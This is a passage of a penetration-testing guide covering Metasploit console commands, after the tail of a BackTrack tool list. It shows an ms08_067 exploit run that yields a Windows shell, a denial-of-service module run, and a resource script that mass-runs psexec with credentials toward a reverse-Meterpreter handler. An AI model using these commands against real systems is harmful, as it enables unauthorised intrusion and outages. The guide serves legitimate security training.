Windows Compatibility Layer (Web Browser) ii wireless-crda 1.12 Wireless Central Regulatory Domain Agent ii wireless-tools 30~pre9-3ubuntu4 Tools for manipulating Linux Wireless Extensions ii wireshark 1.4.7-bt0 A network "sniffer" - a tool that captures and analyzes packets off the wire. ii wordlists 1.0-bt0 wordlists ii wpasupplicant 0.6.9-3ubuntu3 client support for WPA and WPA2 (IEEE 802.11i) ii wstool 0.14001-bt4 WSTOOL is OS-independence Web vulnerable scanner. 
ii  x-ttcidfont-conf  32  TrueType and CID fonts configuration for X
ii  x11-apps  7.5+1ubuntu2  X applications
ii  x11-common  1:7.5+5ubuntu1  (X.Org) infrastructure
ii  x11-session-utils  7.5+1  X session utilities
ii  x11-utils  7.5+3  X11 utilities
ii  x11-xfs-utils  7.4+1build2  X font server utilities
ii  x11-xkb-utils  7.5+1  X11 XKB utilities
ii  x11-xserver-utils  7.5+1ubuntu2.1  X server utilities
ii  x11proto-core-dev  7.0.16-1  X11 core wire protocol and auxiliary headers
ii  x11proto-input-dev  2.0-2  X11 Input extension wire protocol
ii  x11proto-kb-dev  1.0.4-1  X11 XKB extension wire protocol
ii  xauth  1:1.0.4-1  X authentication utility
ii  xbase-clients  1:7.5+5ubuntu1  miscellaneous X clients - metapackage
ii  xbitmaps  1.1.0-1  Base X bitmaps
ii  xdg-utils  1.0.2-6.1ubuntu3.1  desktop integration utilities from freedesktop.org
ii  xfonts-base  1:1.0.1  standard fonts for X
ii  xfonts-encodings  1:1.0.3-1  Encodings for X.Org fonts
ii  xfonts-utils  1:7.5+2  X Window System font utility programs
ii  xgps  1.1.5-bt0  xGPS is a free project aiming to bring powerful and easy to use navigation software
ii  1.2.0-1  X server initialisation tool
ii  xkb-data  1.8-1ubuntu8.1~10.04.1  X Keyboard Extension (XKB) configuration data
ii  xml-core  0.13  XML infrastructure and XML catalog file support
ii  xplico  0.6.3-bt0  The goal of Xplico is to extract from an internet traffic capture the application data it contains.
ii  xprobe2  2.1-bt2  Active OS fingerprinting tool.
ii  xresprobe  0.4.24ubuntu9  X Resolution Probe
ii  xserver-common  2:1.7.6-2ubuntu7.6  common files used by various X servers
ii  xserver-  2:1.7.6-2ubuntu7.6  nested X server
ii  xserver-xorg  1:7.5+5ubuntu1  the X.Org X server
ii  xserver-xorg-core  2:1.7.6-2ubuntu7.6  Xorg X server - core server
ii  xserver-xorg-input-all  1:7.5+5ubuntu1  the X.Org X server -- input driver metapackage
ii  xserver-xorg-input-evdev  1:2.3.2-5ubuntu1  X.Org X server -- evdev input driver
ii  xserver-xorg-input-mouse  1:1.5.0-1  X.Org X server -- mouse input driver
ii  xserver-xorg-input-synaptics  1.2.2-1ubuntu4  Synaptics TouchPad driver for X.Org server
ii  xserver-xorg-input-vmmouse  1:12.6.5-4ubuntu2  X.Org X server -- VMMouse input driver to use with VMWare
ii  xserver-xorg-input-wacom  1:0.10.5-0ubuntu4.1  X.Org X server -- Wacom input driver
ii  xserver-xorg-video-all  1:7.5+5ubuntu1  the X.Org X server -- output driver metapackage
ii  xserver-xorg-video-apm  1:1.2.2-1  X.Org X server -- APM display driver
ii  xserver-xorg-video-ark  1:0.7.2-1  X.Org X server -- ark display driver
ii  xserver-xorg-video-ati  1:6.13.0-1ubuntu5  X.Org X server -- AMD/ATI display driver wrapper
ii  xserver-xorg-video-chips  1:1.2.2-1  X.Org X server -- Chips display driver
ii  xserver-xorg-video-cirrus  1:1.3.2-1ubuntu1  X.Org X server -- Cirrus display driver
ii  xserver-xorg-video-fbdev  1:0.4.1-1ubuntu1  X.Org X server -- fbdev display driver
ii  xserver-xorg-video-geode  2.11.11-1~lucid1  X.Org X server -- Geode GX2/LX display driver
ii  xserver-xorg-video-i128  1:1.3.3-1  X.Org X server -- i128 display driver
ii  xserver-xorg-video-i740  1:1.3.2-1  X.Org X server -- i740 display driver
ii  xserver-xorg-video-intel  2:2.9.1-3ubuntu5  X.Org X server -- Intel i8xx, i9xx display driver
ii  xserver-xorg-video-mach64  6.8.2-2  X.Org X server -- ATI Mach64 display driver
ii  xserver-xorg-video-mga  1:1.4.11.dfsg-2ubuntu1  X.Org X server -- MGA display driver
ii  xserver-xorg-video-neomagic  1:1.2.4-2  X.Org X server -- Neomagic display driver
ii  xserver-xorg-video-nouveau  1:0.0.15+git20100219+9b4118d-0ubuntu5  X.Org X server -- Nouveau display driver (experimental)
ii  xserver-xorg-video-nv  1:2.1.15-1ubuntu3  X.Org X server -- NV display driver
ii  xserver-xorg-video-openchrome  1:0.2.904+svn827-1  X.Org X server -- VIA display driver
ii  xserver-xorg-video-r128  6.8.1-2ubuntu1  X.Org X server -- ATI r128 display driver
ii  xserver-xorg-video-radeon  1:6.13.0-1ubuntu5  X.Org X server -- AMD/ATI Radeon display driver
ii  xserver-xorg-video-rendition  1:4.2.3-1  X.Org X server -- Rendition display driver
ii  xserver-xorg-video-s3  1:0.6.3-1  X.Org X server -- legacy S3 display driver
ii  xserver-xorg-video-s3virge  1:1.10.4-1  X.Org X server -- S3 ViRGE display driver
ii  xserver-xorg-video-savage  1:2.3.1-1ubuntu1  X.Org X server -- Savage display driver
ii  xserver-xorg-video-siliconmotion  1:1.7.3-1  X.Org X server -- SiliconMotion display driver
ii  xserver-xorg-video-sis  1:0.10.2-2  X.Org X server -- SiS display driver
ii  xserver-xorg-video-sisusb  1:0.9.3-1  X.Org X server -- SiS USB display driver
ii  xserver-xorg-video-tdfx  1:1.4.3-1  X.Org X server -- tdfx display driver
ii  xserver-xorg-video-trident  1:1.3.3-1  X.Org X server -- Trident display driver
ii  xserver-xorg-video-tseng  1:1.2.3-1  X.Org X server -- Tseng display driver
ii  xserver-xorg-video-v4l  1:0.2.0-4  X.Org X server -- Video 4 Linux display driver
ii  xserver-xorg-video-vesa  1:2.3.0-1ubuntu1  X.Org X server -- VESA display driver
ii  xserver-xorg-video-vmware  1:10.16.9-1  X.Org X server -- VMware display driver
ii  xserver-xorg-video-voodoo  1:1.2.3-1  X.Org X server -- Voodoo display driver
ii  xsltproc  1.1.26-1ubuntu1  XSLT command line processor
ii  xssed  1.0-bt1  Firefox link to XSSED.com.
ii  xsser  1.5-bt2  Cross Site "Scripter" is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based applications.
ii  xssfuzz  1.1-bt1  It's for finding new vectors and testing those within the context of multiple encoding methods.
ii  256-1ubuntu1  emulator
ii  xtrans-dev  1.2.5-1  X transport library (development files)
ii  xulrunner-1.9.2  1.9.2.17+build3+nobinonly-0ubuntu0.10.04.1  XUL + XPCOM application runner
ii  xutils-dev  1:7.5+2  X Window System utility programs for development
ii  xz-utils  4.999.9beta+20091116-1  XZ-format compression utilities
ii  yelp  2.30.0-0ubuntu2  Help browser for GNOME
ii  yersinia  0.7.1-bt0  A network tool designed to take advantage of some weaknesses in different network protocols.
ii  zenity  2.30.0-0ubuntu1  Display graphical dialog boxes from shell scripts
ii  zip  3.0-2  Archiver for .zip files
ii  zlib1g  1:1.2.3.3.dfsg-15ubuntu1  compression library - runtime
ii  zlib1g-dev  1:1.2.3.3.dfsg-15ubuntu1  compression library - development

End of the tools.

Chapter 2: The Metasploit Framework

This chapter introduces you to the most widely used exploitation framework: the Metasploit Framework.

The Metasploit Project is a project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Its most well-known sub-project is the open-source Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, the shellcode archive, and security research. The Metasploit Project is also well known for anti-forensic and evasion tools, some of which are built into the Metasploit Framework. For those who don't care for history, let the game begin.

Terminology:

Exploit:

An exploit is the means by which an attacker, or pen tester for that matter, takes advantage of a flaw within a system, an application, or a service. An attacker uses an exploit to attack a system in a way that results in a particular desired outcome that the developer never intended. Common exploits include buffer overflows, web application vulnerabilities (such as SQL injection), and configuration errors.

Payload

A payload is code that we want the system to execute and that is to be selected and delivered by the Framework. For example, a reverse shell is a payload that creates a connection from the target machine back to the attacker as a Windows command prompt (see Chapter 5), whereas a bind shell is a payload that "binds" a command prompt to a listening port on the target machine, to which the attacker can then connect. A payload could also be something as simple as a few commands to be executed on the target operating system.

Shellcode

Shellcode is a set of instructions used as a payload when exploitation occurs.

Shellcode is typically written in assembly language. In most cases, a command shell or a Meterpreter shell will be provided after the series of instructions have been performed by the target machine, hence the name.

Module

A module in the context of this book is a piece of software that can be used by the Metasploit Framework. At times, you may require the use of an exploit module, a software component that conducts the attack. Other times, an auxiliary module may be required to perform an action such as scanning or system enumeration. These interchangeable modules are the core of what makes the Framework so powerful.

Listener

A listener is a component within Metasploit that waits for an incoming connection of some sort. For example, after the target machine has been exploited, it may call the attacking machine over the Internet. The listener handles that connection, waiting on the attacking machine to be contacted by the exploited system.

Metasploit Interfaces:

MSFconsole

Msfconsole is by far the most popular part of the Metasploit Framework, and for good reason. It is one of the most flexible, feature-rich, and well-supported tools within the Framework. Msfconsole provides a handy all-in-one interface to almost every option and setting available in the Framework; it's like a one-stop shop for all of your exploitation dreams. You can use msfconsole to do everything, including launching an exploit, loading auxiliary modules, performing enumeration, creating listeners, or running mass exploitation against an entire network.

Although the Metasploit Framework is constantly changing, a subset of commands remain relatively constant. By mastering the basics of msfconsole, you will be able to keep up with any changes. To illustrate the importance of learning msfconsole, it will be used in nearly every chapter of the book.

To launch msfconsole, enter msfconsole at the command line. To get help on any console command, use 'help' followed by the command name; for example, 'help connect' describes the connect command. For those who are more graphically oriented and want to try a different approach, look at Armitage. I would like to tell you that msfconsole is what most hackers use.

Msfcli

Msfcli provides a powerful command-line interface to the framework. Note that when using msfcli, variables are assigned using '=' and that all options are case-sensitive.

root@bt4:~# msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.201 PAYLOAD=windows/shell/bind_tcp E
[*] Please wait while we load the module tree...

                =[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ -- --=[ 676 exploits - 328 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
       =[ svn r11084 updated today (2010.11.21)

RHOST => 192.168.1.201
PAYLOAD => windows/shell/bind_tcp
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (240 bytes) to 192.168.1.201
[*] Command shell session 1 opened (192.168.1.101:35009 -> 192.168.1.201:4444) at 2010-11-21 14:44:42 -0700

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

If you aren't entirely sure which options belong to a particular module, you can append the letter 'O' to the end of the string at whichever point you are stuck. That is why they say BackTrack is like giving a gun to monkeys.

root@bt4:/pentest/exploits/framework3# ./msfcli windows/smb/ms08_067_netapi O
[*] Please wait while we load the module tree...

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

To display the payloads that are available for the current module, append the letter 'P' to the command-line string.

root@bt4:/pentest/exploits/framework3# ./msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.115 P
[*] Please wait while we load the module tree...

Compatible payloads
===================

   Name                Description
   ----                -----------
   generic/debug_trap  Generate a debug trap in the target process
   ...snip...

The other options available to msfcli are available by issuing 'msfcli -h'.

Benefits of msfcli

- Supports the launching of exploits and auxiliary modules
- Useful for specific tasks
- Good for learning
- Convenient to use when testing or developing a new exploit
- Good tool for one-off exploitation
- Excellent if you know exactly which exploit and options you need
- Wonderful for use in scripts and basic automation

The only real drawback of msfcli is that it is not supported quite as well as msfconsole and it can only handle one shell at a time, making it rather impractical for client-side attacks. It also doesn't support any of the advanced automation features of msfconsole.

The next section has been copy-pasted from Metasploit Unleashed, so the formatting is bad; I hope that you look for knowledge, not the format. The best way to learn the framework is to type the commands in the console while you go through the section.

Tab Completion

The msfconsole is designed to be fast to use and one of the features that helps this goal is tab completion. With the wide array of modules available, it can be difficult to remember the exact name and path of the particular module you wish to make use of. As with most other shells, entering what you know and pressing 'Tab' will present you with a list of options available to you or auto-complete the string if there is only one option. Tab completion depends on the ruby readline extension and nearly every command in the console supports tab completion.

For example, each of the following partial strings can be completed by pressing Tab:

use exploit/windows/dce
use .*netapi.*
set LHOST
show
set TARGET
set PAYLOAD windows/shell/
exp

msf > use exploit/windows/smb/ms
use exploit/windows/smb/ms03_049_netapi
use exploit/windows/smb/ms04_007_killbill
use exploit/windows/smb/ms04_011_lsass
use exploit/windows/smb/ms04_031_netdde
use exploit/windows/smb/ms05_039_pnp
use exploit/windows/smb/ms06_025_rasmans_reg
use exploit/windows/smb/ms06_025_rras
use exploit/windows/smb/ms06_040_netapi
use exploit/windows/smb/ms06_066_nwapi
use exploit/windows/smb/ms06_066_nwwks
use exploit/windows/smb/ms08_067_netapi
use exploit/windows/smb/msdns_zonename
msf > use exploit/windows/smb/ms08_067_netapi

The back Command

Once you have finished working with a particular module, or if you inadvertently select the wrong module, you can issue the 'back' command to move out of the current context. This, however, is not required. Just as you can in commercial routers, you can switch modules from within other modules. As a reminder, variables will only carry over if they are set globally.

msf auxiliary(ms09_001_write) > back
msf >

The check Command

There aren't many exploits that support it, but there is also a 'check' option that will check to see if a target is vulnerable to a particular exploit instead of actually exploiting it.

msf exploit(ms04_045_wins) > show options

Module options:

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.1.114    yes       The target address
   RPORT  42               yes       The target port

Exploit target:

   Id  Name
   --  ----
   0   Windows 2000 English

msf exploit(ms04_045_wins) > check
[-] Check failed: The connection was refused by the remote host (192.168.1.114:42)

The connect Command

There is a miniature netcat clone built into the msfconsole that supports SSL, proxies, pivoting, and file sends. By issuing the 'connect' command with an IP address and port number, you can connect to a remote host from within msfconsole the same as you would with netcat or telnet.

msf > connect 192.168.1.1 23
[*] Connected to 192.168.1.1:23
ÿýÿýÿý!ÿûÿû
DD-WRT v24 std (c) 2008 NewMedia-NET GmbH
Release: 07/27/08 (SVN revision: 10011)
ÿ
DD-WRT login:

By passing the '-s' argument to connect, it will connect via SSL:

msf > connect -s www.metasploit.com 443
[*] Connected to www.metasploit.com:443
GET / HTTP/1.0

HTTP/1.1 302 Found
Date: Sat, 25 Jul 2009 05:03:42 GMT
Server: Apache/2.2.11
Location: http://www.metasploit.org/

exploit vs. run

When launching an exploit, you issue the 'exploit' command, whereas if you are using an auxiliary module the proper usage is 'run', although 'exploit' will work as well.

msf auxiliary(ms09_001_write) > run

Attempting to crash the remote host...
datalenlow=65535 dataoffset=65535 fillersize=72
rescue
datalenlow=55535 dataoffset=65535 fillersize=72
rescue
datalenlow=45535 dataoffset=65535 fillersize=72
rescue
datalenlow=35535 dataoffset=65535 fillersize=72
rescue
datalenlow=25535 dataoffset=65535 fillersize=72
rescue
...snip...

The irb Command

Running the 'irb' command will drop you into a live Ruby interpreter shell where you can issue commands and create Metasploit scripts on the fly. This feature is also very useful for understanding the internals of the Framework.

msf > irb
[*] Starting IRB shell...

>> puts "Hello, metasploit!"
Hello, metasploit!
>> Framework::Version
=> "3.3-dev"
>> framework.modules.keys.length
=> 744

The jobs Command

Jobs are modules that are running in the background. The 'jobs' command provides the ability to list and terminate these jobs.

msf exploit(ms08_067_netapi) > jobs -h
Usage: jobs [options]

Active job manipulation and interaction.

OPTIONS:

    -K  Terminate all running jobs.
    -h  Help banner.
    -k  Terminate the specified job name.
    -l  List all running jobs.

The load Command

The 'load' command loads a plugin from Metasploit's 'plugin' directory. Arguments are passed as 'key=val' on the shell.

msf > load
Usage: load [var=val var=val ...]

Load a plugin from the supplied path. The optional var=val options are custom parameters that can be passed to plugins.

msf > load pcap_log
[*] Successfully loaded plugin: pcap_log

The unload Command

Conversely, the 'unload' command unloads a previously loaded plugin and removes any extended commands.

msf > load pcap_log
[*] Successfully loaded plugin: pcap_log
msf > unload pcap_log
Unloading plugin pcap_log...unloaded.

The loadpath Command

The 'loadpath' command will load a third-party module tree from the given path, so you can point Metasploit at your 0-day exploits, encoders, payloads, etc.

msf > loadpath /home/secret/modules
Loaded 0 modules.

The resource Command

Some attacks, such as Karmetasploit, use a resource (batch) file that you can load through the msfconsole using the 'resource' command. These files are a basic form of scripting for msfconsole: it runs the commands in the file in sequence. Later on we will discuss how, outside of Karmetasploit, that can be very useful.

msf > resource karma.rc
resource> load db_sqlite3
[-]
[-] The functionality previously provided by this plugin has been
[-] integrated into the core command set. Use the new 'db_driver'
[-] command to use a database driver other than sqlite3 (which
[-] is now the default). All of the old commands are the same.
[-]
[-] Failed to load plugin from /pentest/exploits/framework3/plugins/db_sqlite3: Deprecated plugin
resource> db_create /root/karma.db
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: /root/karma.db
resource> use auxiliary/server/browser_autopwn
resource> setg AUTOPWN_HOST 10.0.0.1
AUTOPWN_HOST => 10.0.0.1
...snip...

Batch files can greatly speed up testing and development times as well as allow the user to automate many tasks. Besides loading a batch file from within msfconsole, they can also be passed at startup using the '-r' flag. The simple example below creates a batch file to display the Metasploit version number at startup.

root@bt4-pre:/pentest/exploits/framework3# echo version > version.rc
root@bt4-pre:/pentest/exploits/framework3# ./msfconsole -r version.rc

                =[ metasploit v3.3-rc1 [core:3.3 api:1.0]
+ -- --=[ 379 exploits - 234 payloads
+ -- --=[ 20 encoders - 7 nops
       =[ 155 aux

resource> version
Framework: 3.3-dev.6055
Console  : 3.3-dev.6476
msf >
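As an added example that is not part of the original text and not one of the resource scripts shipped with Metasploit, here is a resource file that does more than print the version: it sets globals, starts a persistent multi/handler in the background, and uses an embedded Ruby block to launch psexec against a list of hosts. It assumes what msfconsole resource files provide: Ruby between <ruby> and </ruby> tags, inside which run_single executes a console command as if typed at the prompt. The hosts, credentials and addresses are made up. DisablePayloadHandler stops each psexec run from trying to bind its own handler on the port the multi/handler already holds.

```text
# handler_and_psexec.rc -- load with "resource handler_and_psexec.rc"
# or at startup with "msfconsole -r handler_and_psexec.rc".
# Hosts, credentials and addresses below are made up for this example.

# Globals first, so every module used later inherits them.
setg LHOST 192.168.1.101
setg LPORT 4444

# One background handler that keeps listening after the first session
# (ExitOnSession false), so several hosts can call back to the same port.
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set ExitOnSession false
exploit -j -z

# Embedded Ruby: loop over the targets instead of retyping the commands.
# run_single executes a console command exactly as if typed at the prompt.
<ruby>
targets = %w[192.168.1.104 192.168.1.105 192.168.1.106]
targets.each do |host|
  run_single("use exploit/windows/smb/psexec")
  run_single("set RHOST #{host}")
  run_single("set SMBUSER victim")
  run_single("set SMBPASS s3cr3t")
  run_single("set PAYLOAD windows/meterpreter/reverse_tcp")
  # The multi/handler above already owns LPORT; do not start a second one.
  run_single("set DisablePayloadHandler true")
  run_single("exploit -j -z")
end
</ruby>

# Back at the prompt: see what called home.
sessions -l
```

Because the handler is a background job, the psexec runs return immediately and every successful callback shows up under sessions -l; 'jobs -l' shows the handler still waiting for the rest.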

The route Command

The 'route' command in Metasploit allows you to route sockets through a session or 'comm', providing basic pivoting capabilities. To add a route, you pass the target subnet and network mask followed by the session (comm) number.

msf exploit(ms08_067_netapi) > route
Usage: route [add/remove/get/flush/print] subnet netmask [comm/sid]

Route traffic destined to a given subnet through a supplied session.
The default comm is Local.

msf exploit(ms08_067_netapi) > route add 192.168.1.0 255.255.255.0 2
msf exploit(ms08_067_netapi) > route print

Active Routing Table
====================

   Subnet       Netmask        Gateway
   ------       -------        -------
   192.168.1.0  255.255.255.0  Session 2
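As an added example, not the framework's own Rex::Socket::SwitchBoard code, the Ruby class below models what that routing table does when a socket is opened through the framework: each route maps a subnet and netmask to a session (comm), a lookup takes the most specific matching route, and anything unmatched stays Local. Addresses and session numbers are made up, and comm_for is my name for the lookup, not a Metasploit API. It goes a little beyond the transcript above by showing that a host route (/32) through one session overrides a /24 through another.

```ruby
# Added example: a minimal model of a pivot routing table, in the spirit
# of msfconsole's "route add/remove/print". Not Metasploit's own code.
require 'ipaddr'

class PivotRoutes
  Route = Struct.new(:subnet, :netmask, :comm)

  def initialize
    @routes = []
  end

  # route add 192.168.1.0 255.255.255.0 2
  def add(subnet, netmask, comm)
    net = IPAddr.new(subnet).mask(netmask)   # normalise: clears host bits
    @routes << Route.new(net, netmask, comm)
    self
  end

  # route remove 192.168.1.0 255.255.255.0 2
  def remove(subnet, netmask, comm)
    net = IPAddr.new(subnet).mask(netmask)
    @routes.reject! { |r| r.subnet == net && r.netmask == netmask && r.comm == comm }
    self
  end

  # Longest-prefix match: the most specific route wins, so a /32 for a
  # single host can be sent through a different session than its /24.
  # Anything that matches no route is handled locally ("Local" comm).
  def comm_for(address)
    ip = IPAddr.new(address)
    best = @routes.select { |r| r.subnet.include?(ip) }
                  .max_by { |r| prefix_length(r.netmask) }
    best ? best.comm : 'Local'
  end

  # The "route print" table.
  def print_table
    lines = ['Subnet           Netmask          Gateway']
    @routes.each do |r|
      gw = r.comm == 'Local' ? 'Local' : "Session #{r.comm}"
      lines << format('%-16s %-16s %s', r.subnet.to_s, r.netmask, gw)
    end
    lines.join("\n")
  end

  private

  # 255.255.255.0 -> 24
  def prefix_length(netmask)
    IPAddr.new(netmask).to_i.to_s(2).count('1')
  end
end

if __FILE__ == $0
  table = PivotRoutes.new
  table.add('192.168.1.0', '255.255.255.0', 2)      # whole subnet via session 2
  table.add('192.168.1.50', '255.255.255.255', 3)   # one host via session 3
  puts table.print_table
  puts table.comm_for('192.168.1.7')    # 2
  puts table.comm_for('192.168.1.50')   # 3
  puts table.comm_for('10.0.0.5')       # Local
end
```

The practical point for a pentest: every socket the framework opens, including those of auxiliary scanners you run next, consults this table first, so a stale route left behind after a session dies makes those modules fail silently until you 'route remove' it.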

The info Command

The 'info' command will provide detailed information about a particular module, including all options, targets, and other information. Be sure to always read the module description prior to using it, as some may have undesired effects.

The info command also provides the following information:

- The author and licensing information
- Vulnerability references (ie: CVE, BID, etc)
- Any payload restrictions the module may have

msf > info dos/windows/smb/ms09_001_write

       Name: Microsoft SRV.SYS WriteAndX Invalid DataOffset
    Version: 6890
    License: Metasploit Framework License (BSD)

Provided by:
  j.v.vallejo

The set/unset Commands

The 'set' command allows you to configure Framework options and parameters for the current module you are working with.

msf auxiliary(ms09_001_write) > set RHOST 192.168.1.1
RHOST => 192.168.1.1
msf auxiliary(ms09_001_write) > show options

Module options:

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.1.1      yes       The target address
   RPORT  445              yes       Set the SMB service port

A recently added feature in Metasploit is the ability to set an encoder to use at runtime. This is particularly useful in exploit development when you aren't quite certain which payload encoding methods will work with an exploit.

msf exploit(ms08_067_netapi) > show encoders

Compatible encoders
===================

   Name                    Description
   ----                    -----------
   cmd/generic_sh          Generic Shell Variable Substitution Command Encoder
   generic/none            The "none" Encoder
   mipsbe/longxor          XOR Encoder
   mipsle/longxor          XOR Encoder
   php/base64              PHP Base64 encoder
   ppc/longxor             PPC LongXOR Encoder
   ppc/longxor_tag         PPC LongXOR Encoder
   sparc/longxor_tag       SPARC DWORD XOR Encoder
   x64/xor                 XOR Encoder
   x86/alpha_mixed         Alpha2 Alphanumeric Mixedcase Encoder
   x86/alpha_upper         Alpha2 Alphanumeric Uppercase Encoder
   x86/avoid_utf8_tolower  Avoid UTF8/tolower
   x86/call4_dword_xor     Call+4 Dword XOR Encoder
   x86/countdown           Single-byte XOR Countdown Encoder
   x86/fnstenv_mov         Variable-length Fnstenv/mov Dword XOR Encoder
   x86/jmp_call_additive   Polymorphic Jump/Call XOR Additive Feedback Encoder
   x86/nonalpha            Non-Alpha Encoder
   x86/nonupper            Non-Upper Encoder
   x86/shikata_ga_nai      Polymorphic XOR Additive Feedback Encoder
   x86/unicode_mixed       Alpha2 Alphanumeric Unicode Mixedcase Encoder
   x86/unicode_upper       Alpha2 Alphanumeric Unicode Uppercase Encoder

msf exploit(ms08_067_netapi) > set encoder x86/shikata_ga_nai
encoder => x86/shikata_ga_nai

The unset Command

The opposite of the 'set' command, of course, is 'unset'. 'Unset' removes a parameter previously configured with 'set'. You can remove all assigned variables with 'unset all'.

msf > set RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf > set THREADS 50
THREADS => 50
msf > set

Global
======

  Name     Value
  ----     -----
  RHOSTS   192.168.1.0/24
  THREADS  50

msf > unset THREADS
Unsetting THREADS...
msf > unset all
Flushing datastore...
msf > set

Global
======

No entries in data store.

The sessions Command

The 'sessions' command allows you to list, interact with, and kill spawned sessions. The sessions can be shells, Meterpreter sessions, VNC, etc.

msf > sessions
Usage: sessions [options]

Active session manipulation and interaction.

OPTIONS:

    -d  Detach an interactive session
    -h  Help banner.
    -i  Interact with the supplied session identifier.
    -k  Terminate session.
    -l  List all active sessions.
    -q  Quiet mode.
    -v  List verbose fields.

To list any active sessions, pass the '-l' option to 'sessions'.

msf exploit(3proxy) > sessions -l

Active sessions
===============

  Id  Description    Tunnel
  --  -----------    ------
  1   Command shell  192.168.1.101:33191 -> 192.168.1.104:4444

To interact with a given session, you just need to use the '-i' switch followed by the Id number of the session.

msf exploit(3proxy) > sessions -i 1
[*] Starting interaction with 1...

C:\WINDOWS\system32>

The search Command

The msfconsole includes an extensive regular-expression based search functionality. If you have a general idea of what you are looking for, you can search for it via 'search <keyword>'. In the output below, a search is being made for MS Bulletin MS09-001. The search function will locate this string within the module names, descriptions, references, etc. Note that the naming convention for Metasploit modules uses underscores rather than hyphens.

msf > search ms09-001
[*] Searching loaded modules for pattern 'ms09-001'...

Auxiliary
=========

   Name                            Description
   ----                            -----------
   dos/windows/smb/ms09_001_write  Microsoft SRV.SYS WriteAndX Invalid DataOffset

The show Command

Entering 'show' at the msfconsole prompt will display every module within Metasploit.

msf > show

Encoders
========

   Name                    Description
   ----                    -----------
   cmd/generic_sh          Generic Shell Variable Substitution Command Encoder
   generic/none            The "none" Encoder
   mipsbe/longxor          XOR Encoder
   ...snip...

There are a number of 'show' commands you can use, but the ones you will use most frequently are 'show auxiliary', 'show exploits', 'show payloads', 'show encoders', and 'show nops'.

Executing 'show auxiliary' will display a listing of all of the available auxiliary modules within Metasploit. As mentioned earlier, auxiliary modules include scanners, denial of service modules, fuzzers, and more.

msf > show auxiliary

Auxiliary
=========

   Name                              Description
   ----                              -----------
   admin/backupexec/dump             Veritas Backup Exec Windows Remote File Access
   admin/backupexec/registry         Veritas Backup Exec Server Registry Access
   admin/cisco/ios_http_auth_bypass  Cisco IOS HTTP Unauthorized Administrative Access
   ...snip...

Naturally, 'show exploits' will be the command you are most interested in running since, at its core, Metasploit is all about exploitation. Run 'show exploits' to get a listing of all exploits contained in the framework.

msf > show exploits

Exploits
========

   Name                              Description
   ----                              -----------
   aix/rpc_ttdbserverd_realpath      ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow
   bsdi/softcart/mercantec_softcart  Mercantec SoftCart CGI Overflow
   ...snip...

Running 'show payloads' will display all of the different payloads for all platforms available within Metasploit.

msf > show payloads

Payloads
========

   Name                       Description
   ----                       -----------
   aix/ppc/shell_bind_tcp     AIX Command Shell, Bind TCP Inline
   aix/ppc/shell_find_port    AIX Command Shell, Find Port Inline
   aix/ppc/shell_reverse_tcp  AIX Command Shell, Reverse TCP Inline
   ...snip...

As you can see, there are a lot of payloads available. Fortunately, when you are in the context of a particular exploit, running 'show payloads' will only display the payloads that are compatible with that particular exploit. For instance, if it is a Windows exploit, you will not be shown the Linux payloads.

msf exploit(ms08_067_netapi) > show payloads

Compatible payloads
===================

   Name                              Description
   ----                              -----------
   generic/debug_trap                Generic x86 Debug Trap
   generic/debug_trap/bind_ipv6_tcp  Generic x86 Debug Trap, Bind TCP Stager (IPv6)
   generic/debug_trap/bind_nonx_tcp  Generic x86 Debug Trap, Bind TCP Stager (No NX or Win7)
   ...snip...

If you have selected a specific module, you can issue the 'show options' command to display which settings are available and/or required for that specific module.

msf exploit(ms08_067_netapi) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

If you aren't certain whether an operating system is vulnerable to a particular exploit, run the 'show targets' command from within the context of an exploit module to see which targets are supported.

msf exploit(ms08_067_netapi) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic Targeting
   1   Windows 2000 Universal
   2   Windows XP SP0/SP1 Universal
   3   Windows XP SP2 English (NX)
   4   Windows XP SP3 English (NX)
   5   Windows 2003 SP0 Universal
   ...snip...
If you wish to further fine-tune an exploit, you can see more advanced options by running 'show advanced'.

msf exploit(ms08_067_netapi) > show advanced

Module advanced options:

   Name           : CHOST
   Current Setting:
   Description    : The local client address

   Name           : CPORT
   Current Setting:
   Description    : The local client port
   ...snip...

Running 'show encoders' will display a listing of the encoders that are available within MSF.

msf > show encoders

Encoders
========

   Name                    Description
   ----                    -----------
   cmd/generic_sh          Generic Shell Variable Substitution Command Encoder
   generic/none            The "none" Encoder
   mipsbe/longxor          XOR Encoder
   mipsle/longxor          XOR Encoder
   php/base64              PHP Base64 encoder
   ppc/longxor             PPC LongXOR Encoder
   ppc/longxor_tag         PPC LongXOR Encoder
   sparc/longxor_tag       SPARC DWORD XOR Encoder
   x64/xor                 XOR Encoder
   x86/alpha_mixed         Alpha2 Alphanumeric Mixedcase Encoder
   x86/alpha_upper         Alpha2 Alphanumeric Uppercase Encoder
   x86/avoid_utf8_tolower  Avoid UTF8/tolower
   x86/call4_dword_xor     Call+4 Dword XOR Encoder
   x86/countdown           Single-byte XOR Countdown Encoder
